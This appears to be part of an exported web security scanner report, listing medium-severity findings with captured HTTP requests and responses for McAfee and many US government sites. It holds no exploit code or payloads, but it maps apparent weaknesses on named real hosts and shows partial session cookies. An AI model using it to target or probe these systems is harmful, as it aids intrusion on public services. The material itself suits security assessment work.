| GET /secure/purchase/ HTTP/1.1 Host: home.mcafee.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_ev8=%5B%5B%27mcafee%27 |
| HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: session%5Fdata= Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:23 GMT; path=/; HttpOnly Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:18:23 GMT; path=/; HttpOnly Set-Cookie: SessionInfo=AffiliateId=0 Set-Cookie: SessionInfo=AffiliateId=0 Set-Cookie: SessionInfo=AffiliateId=0 Set-Cookie: lBounceURL=http://home Set-Cookie: lUsrCtxSession= Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:23 GMT; path=/; HttpOnly Set-Cookie: HPrst=gu=65a488fe-5ba0 Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly Set-Cookie: HRntm=aff=0-0&cur=56&cid Set-Cookie: IscartemptySiteidAffid=no X-Powered-By: ASP.NET MS: SJV2 X-UA-Compatible: IE=8 Date: Fri, 29 Apr 2011 21:18:22 GMT Content-Length: 37412 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmldom" xmlns="http://www.w3.org ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://iris.custhelp.com |
| Path: | / |
| GET / HTTP/1.1 Host: iris.custhelp.com Connection: keep-alive Referer: http://www.va.gov/iris User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=162278755 |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 00:45:59 GMT P3P: policyref="http://iris Cache-Control: no-cache Expires: -1 Pragma: no-cache Set-Cookie: cp_session=aU_pMUOYs RNT-Time: D=85565 t=1304124359766778 RNT-Machine: 05 X-Cnection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: TS2744aa=09fc138b83f Content-Length: 29357 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <h ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://iris.custhelp.com |
| Path: | /app/answers/detail/a_id |
| GET /app/answers/detail/a_id Host: iris.custhelp.com Connection: keep-alive Referer: https://iris.custhelp.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=162278755 |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 00:47:53 GMT P3P: policyref="http://iris Cache-Control: no-cache Expires: -1 Pragma: no-cache Set-Cookie: cp_session=aUO4heum5 RNT-Time: D=119504 t=1304124473961813 RNT-Machine: 05 X-Cnection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: TS8118ae=fc55d15bba7 Content-Length: 41356 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <h ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://iris.custhelp.com |
| Path: | /app/home |
| GET /app/home HTTP/1.1 Host: iris.custhelp.com Connection: keep-alive Referer: https://iris.custhelp.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=162278755 |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 00:59:40 GMT P3P: policyref="http://iris Cache-Control: no-cache Expires: -1 Pragma: no-cache Set-Cookie: cp_session=aUeZ92xvA RNT-Time: D=88319 t=1304125180207538 RNT-Machine: 05 X-Cnection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: TS8118ae=6c3373cb5cc Content-Length: 28903 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <h ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://joblink.alabama |
| Path: | /ada/works/Workforce |
| GET /ada/works/Workforce Host: joblink.alabama.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Connection: close Date: Sat, 30 Apr 2011 12:21:34 GMT Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org X-Powered-By: ASP.NET server-error: true Content-Type: text/html; charset=UTF-8 Set-Cookie: CFID=6545172;expires=Mon, 22-Apr-2041 12:21:34 GMT;path=/ Set-Cookie: CFTOKEN=81fbc95d26faba7d Set-Cookie: CFID=6545172;path=/ Set-Cookie: CFTOKEN=81fbc95d26faba7d Set-Cookie: TEST=1;path=/ Bookmark Error <b>You may be seeing this error as a result of bookmarking this page. Unfortunately, our site design will not allow the bookmarking of most internal pages.</b> If you wish to contact th ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://license.ohio.gov |
| Path: | /lookup/default.asp |
| GET /lookup/default.asp HTTP/1.1 Host: license.ohio.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Connection: close Date: Sat, 30 Apr 2011 12:22:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 16380 Content-Type: text/html Set-Cookie: ASPSESSIONIDSQCASDBT Cache-control: private <HTML> <HEAD> <link rel="stylesheet" type="text/css" href="/css/color_scheme <link rel="stylesheet" type="text/css" href="/css/main.css"> <title>License Search</title> <SCRIPT ID=clie ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://louisianadcp |
| Path: | /login.do |
| GET /login.do HTTP/1.1 Host: louisianadcpretire.gwrs Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 12:22:11 GMT Server: FASCore Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Cache-Control: no-cache="set-cookie" Pragma: no-cache Content-Length: 10709 Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=khX0N72Sv Content-Language: en-US P3P: CP="ALL DSP COR CUR ADM DEV TAI HIS OUR OTRi BUS PHY ONL UNI FIN COM NAV INT DEM GOV" Connection: close Content-Type: text/html;charset=UTF-8 <html xmlns="http://www.w3.org <!-- function setFocus() { document.getElementById( ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://moversguide.usps |
| Path: | /icoa/flow.do |
| GET /icoa/flow.do HTTP/1.1 Host: moversguide.usps.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 12:23:20 GMT Server: IBM_HTTP_Server Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Content-Length: 9281 Set-Cookie: JSESSIONID=00007vT2k Keep-Alive: timeout=10, max=3 Connection: Keep-Alive Content-Type: text/html;charset=UTF-8 Content-Language: en Set-Cookie: NSC_fbh-nh-qspe-xfc-443 <?xml version="1.0" encoding="UTF-8" ?> <html> <head> <meta name="title" content="USPS - MoversGuide"> <meta name="author" content="USPS, Imagitas."> ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://nhlicenses.nh.gov |
| Path: | /MyLicense%20Verification |
| GET /MyLicense%20Verification Host: nhlicenses.nh.gov Connection: keep-alive Referer: http://nhlicenses.nh.gov User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Date: Fri, 29 Apr 2011 22:40:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 18456 Set-Cookie: ASP.NET_SessionId Keep-Alive: timeout=3, max=100 Connection: Keep-Alive <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <html> <head> <link rel="stylesheet" href="stylesheets <title>Search</title> </head> <body> </body> ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://njmvcscheduling |
| Path: | /tc/driverlogin.do |
| GET /tc/driverlogin.do HTTP/1.1 Host: njmvcscheduling.state.nj Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.0 500 Internal Server Error Date: Sat, 30 Apr 2011 12:23:49 GMT Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.8e Set-Cookie: JSESSIONID=0000g2fKk Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-control: no-cache Connection: close Content-Type: text/html;charset=ISO Content-Language: en-US Error 500: Cannot find bean business_UserContext in scope session |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://onestop.michigan |
| Path: | /OneStop/ssoNeedPassword |
| GET /OneStop/ssoNeedPassword Host: onestop.michigan.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 400 Bad Request connection: close content-language: en-US content-type: text/html;charset=ISO date: Sat, 30 Apr 2011 12:24:37 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server $wsep: cache-control: no-cache="set-cookie, set-cookie2" expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: AMWEBJCT!%2Fonestop-main Error 400: Request[/ssoNeedPassword] does not contain handler parameter named dispatchCommand <SCRIPT language="JavaScript"> <!-- document.cookie = "IV_JCT=%2Fonestop-main; path=/"; //--> </SCRIPT> |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://onestop.michigan |
| Path: | /onestop-main/OneStop |
| GET /onestop-main/OneStop Host: onestop.michigan.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 400 Bad Request connection: close content-language: en-US content-type: text/html;charset=ISO date: Sat, 30 Apr 2011 12:24:37 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server $wsep: cache-control: no-cache="set-cookie, set-cookie2" expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: AMWEBJCT!%2Fonestop-main Error 400: Request[/ssoRegistration] does not contain handler parameter named dispatchCommand <SCRIPT language="JavaScript"> <!-- document.cookie = "IV_JCT=%2Fonestop-main; path=/"; //--> </SCRIPT> |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://portal.s4web |
| Path: | /psp/por91ssap/SELFS |
| GET /psp/por91ssap/SELFS Host: portal.s4web.state.mn.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PS_LOGINLIST=https:/ |
| HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache Connection: close Date: Sat, 30 Apr 2011 12:24:44 GMT Location: https://portal.s4web Content-Type: text/html Expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: web2-80-PORTAL-PSJSE Set-Cookie: https%3a%2f%2fportal Set-Cookie: PS_TOKENEXPIRE=30_Apr Set-Cookie: SignOnDefault=; domain=.state.mn.us; path=/; secure X-Powered-By: Servlet/2.5 JSP/2.1 Content-Length: 353 <html><head><title>302 Moved Temporarily</title></head <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://portal ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://portal.s4web |
| Path: | /psp/por91ssap/SELFS |
| GET /psp/por91ssap/SELFS Host: portal.s4web.state.mn.us Connection: keep-alive Referer: http://www.state.mn.us User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=205212754 |
| HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache Cache-Control: no-store Connection: close Date: Sat, 30 Apr 2011 11:17:50 GMT Location: https://portal.s4web Content-Type: text/html Expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: web2-80-PORTAL-PSJSE Set-Cookie: https%3a%2f%2fportal Set-Cookie: ExpirePage=https://portal Set-Cookie: PS_LOGINLIST=https:/ Set-Cookie: PS_TOKENEXPIRE=30_Apr Set-Cookie: PS_TOKEN=pgAAAAQDAgE Set-Cookie: SignOnDefault=; domain=.state.mn.us; path=/; secure X-Powered-By: Servlet/2.5 JSP/2.1 Content-Length: 353 <html><head><title>302 Moved Temporarily</title></head <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://portal ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://portal.s4web |
| Path: | /psp/por91ssap/SELFS |
| GET /psp/por91ssap/SELFS Host: portal.s4web.state.mn.us Connection: keep-alive Referer: http://www.state.mn.us User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=205212754 |
| HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache Cache-Control: no-store Connection: close Date: Sat, 30 Apr 2011 11:18:03 GMT Location: https://portal.s4web Content-Type: text/html Expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: web3-80-PORTAL-PSJSE X-Powered-By: Servlet/2.5 JSP/2.1 Set-Cookie: BIGipServerprodss-SWIFT Content-Length: 363 <html><head><title>302 Moved Temporarily</title></head <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://portal ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://portal.s4web |
| Path: | /psp/por91ssap_newwin |
| GET /psp/por91ssap_newwin Host: portal.s4web.state.mn.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PS_LOGINLIST=https:/ |
| HTTP/1.1 302 Moved Temporarily Connection: close Date: Sat, 30 Apr 2011 12:24:46 GMT Location: https://portal.s4web Set-Cookie: web2-80-PORTAL-PSJSE X-Powered-By: Servlet/2.5 JSP/2.1 Content-Length: 331 <html><head><title>302 Moved Temporarily</title></head <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://portal ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://portal01.state.nj |
| Path: | /http:/portal20.sa.state |
| GET /http:/portal20.sa.state Host: portal01.state.nj.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.0 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Sat, 30 Apr 2011 12:24:49 GMT Content-type: text/html;charset=UTF-8 Cache-control: private Expires: 0 X-dsameversion: 7 2005Q4 patch 120954-12 Am_client_type: genericHTML Set-Cookie: %2Fportal20.sa.state.nj Set-Cookie: %2F.state.nj.us Set-Cookie: %2F.state.nj.us Content-Length: 6736 Connection: close <html> <head> <title>Log On To myNewJersey</title> <link rel="stylesheet" href="https://portal01 < ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://secure.apps.state |
| Path: | /dot/mv/mvrenewal/renewal |
| GET /dot/mv/mvrenewal/renewal Host: secure.apps.state.nd.us Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 11:20:33 GMT Server: IBM_HTTP_Server Expires: Sat, 25 Dec 1993 23:59:59 GMT Pragma: no-cache Cache-Control: no-store, no-cache, must-revalidate, max-age=0 Content-Length: 5917 Content-Type: text/html;charset=ISO Content-Language: en-US Set-Cookie: JSESSIONID=00006ggXF Keep-Alive: timeout=15, max=100 Connection: Keep-Alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://secure.kentucky |
| Path: | /portal/login.aspx |
| GET /portal/login.aspx HTTP/1.1 Host: secure.kentucky.gov Connection: keep-alive Referer: http://kentucky.gov/Pages User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=210812687 |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 00:43:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 24079 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html> <head> <title>Kentucky.gov: - Login</title> <meta http-equiv="Content-Type" content="text/htm ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://secure.sces.org |
| Path: | /PDIC/GatewayServlet |
| GET /PDIC/GatewayServlet HTTP/1.1 Host: secure.sces.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 302 Found Date: Sat, 30 Apr 2011 12:28:17 GMT Server: IBM_HTTP_Server Location: https://secure.sces.org Content-Length: 0 Set-Cookie: JSESSIONID=0000ClCDh49 Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/plain Content-Language: en-US |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://services.georgia |
| Path: | /dhr/cspp/do/public |
| GET /dhr/cspp/do/public Host: services.georgia.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.0 200 OK Date: Sat, 30 Apr 2011 12:22:50 GMT Server: Sun-Java-System Content-type: text/html;charset=UTF-8 X-powered-by: Servlet/2.4 Pragma: No-cache Cache-control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT X-powered-by: JSP/2.0 Set-cookie: JSESSIONID=a6618311c Connection: close <html> <body> <table border="0" cellspacing="0" cellpadding="0"> <tr> <td> <body style="background-color: <TABLE cellSpacing=0 cellPadding=0 wid ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://ssl.sc.gov |
| Path: | /osmbareportfiling |
| GET /osmbareportfiling Host: ssl.sc.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 302 Found Cache-Control: private Content-Length: 159 Content-Type: text/html; charset=utf-8 Location: /osmbareportfiling Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Date: Sat, 30 Apr 2011 12:30:49 GMT Connection: close <html><head><title>Object moved</title></head><body <h2>Object moved to <a href="%2fosmbareport </body></html> |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://txapps.texas.gov |
| Path: | /tolapp/txdl/welcome.dl |
| GET /tolapp/txdl/welcome.dl HTTP/1.1 Host: txapps.texas.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 12:26:52 GMT Server: Apache/2.2.17 (Unix) mod_jk/1.2.30 mod_ssl/2.2.17 OpenSSL/1.0.0c Content-Length: 3757 Set-Cookie: JSESSIONID=bRvLN8QDy Content-Language: en X-Powered-By: Servlet/2.5 JSP/2.1 Connection: close Content-Type: text/html; charset=ISO-8859-1 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://txapps.texas.gov |
| Path: | /tolapp/viewandpay |
| GET /tolapp/viewandpay HTTP/1.1 Host: txapps.texas.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 12:26:53 GMT Server: Apache/2.2.17 (Unix) mod_jk/1.2.30 mod_ssl/2.2.17 OpenSSL/1.0.0c Cache-Control: no-cache Cache-Control: no-cache Cache-Control: no-store Content-Length: 5545 Expires: 0 Set-Cookie: JSESSIONID=YhD0N8QD1 X-Powered-By: Servlet/2.5 JSP/2.1 Connection: close Content-Type: text/html; charset=ISO-8859-1 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://unitedalert.com |
| Path: | / |
| GET / HTTP/1.1 Host: unitedalert.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 12:28:52 GMT Server: Apache/2.2 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Set-Cookie: PHPSESSID=ceiaqg112u Set-Cookie: X-Mapping-abiknkkh Connection: close Content-Length: 8865 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html> <head><title>United Alert: Free Emergency Alert and Group Communication Service, SMS and Email </ti ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://web.globalpay.com |
| Path: | /taxpayer/default.asp |
| GET /taxpayer/default.asp HTTP/1.1 Host: web.globalpay.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Connection: close Date: Sat, 30 Apr 2011 12:29:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 1095 Content-Type: text/html Set-Cookie: CISESSIONID=a928f621 Set-Cookie: ASPSESSIONIDQAQCCRDC Cache-control: private <HTML><HEAD><TITLE>Unisys Internet Commerce Enabler Error Message</TITLE></HEAD> ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://www.accesskansas |
| Path: | /businesscenter/index |
| GET /businesscenter/index Host: www.accesskansas.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BIGipServerSEC-01 |
| HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=6002DAF7E Content-Type: text/html Content-Length: 7678 Date: Sat, 30 Apr 2011 12:29:28 GMT Connection: close Set-Cookie: BIGipServerAPTC-08=50GZb <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://www.alabamai |
| Path: | /abc_license/ |
| GET /abc_license/ HTTP/1.1 Host: www.alabamainteractive Connection: keep-alive Referer: http://www.alabama.gov User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 01:24:51 GMT Server: Apache/1.3.41 (Unix) Resin/3.0.25 Cache-Control: private Set-Cookie: JSESSIONID=abcWSekZs Keep-Alive: timeout=20, max=150 Connection: Keep-Alive Content-Type: text/html Content-Length: 3284 <link rel='stylesheet' href='content/common <table width="100%" border="0" align="center" cellpadding="0" cellspacing="0" class="containerTable"> ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://www.colorado.gov |
| Path: | /apps/dps/mvvs/public |
| GET /apps/dps/mvvs/public Host: www.colorado.gov Connection: keep-alive Referer: http://www.colorado.gov/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=1.1304162030.1.1 |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 11:21:46 GMT Server: Resin/3.0.19 Cache-Control: private Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: JSESSIONID=bb1Yl5CUr Vary: Accept-Encoding Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Set-Cookie: BIGipServer=7fjIXX1a Content-Length: 8075 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://www.humanservices |
| Path: | /Compass.Web/ |
| GET /Compass.Web/ HTTP/1.1 Host: www.humanservices.state Connection: keep-alive Referer: http://www.budget.state User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 302 Found Date: Sat, 30 Apr 2011 00:41:22 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Location: /Compass.Web/CMHOM.aspx Set-Cookie: ASP.NET_SessionId Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 144 <html><head><title>Object moved</title></head><body <h2>Object moved to <a href="%2fCompass.Web </body></html> |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://www.humanservices |
| Path: | /idm/managedidmpub/ca12 |
| GET /idm/managedidmpub/ca12 Host: www.humanservices.state Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: LangCode=EN; Image=HomePagePhoto_5.jpg |
| HTTP/1.1 302 Found Connection: close Date: Sat, 30 Apr 2011 12:38:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET set-cookie: SMIDENTITY=Xn255JB Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Location: https://www.humanservices Content-Language: en-US Content-Length: 0 Set-Cookie: JSESSIONID=0000DH9AC Set-Cookie: JSESSIONID=0000G5gEu Server: WebSphere Application Server/6.1 |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://www.myhealth.va |
| Path: | /mhv-portal-web/anonymous |
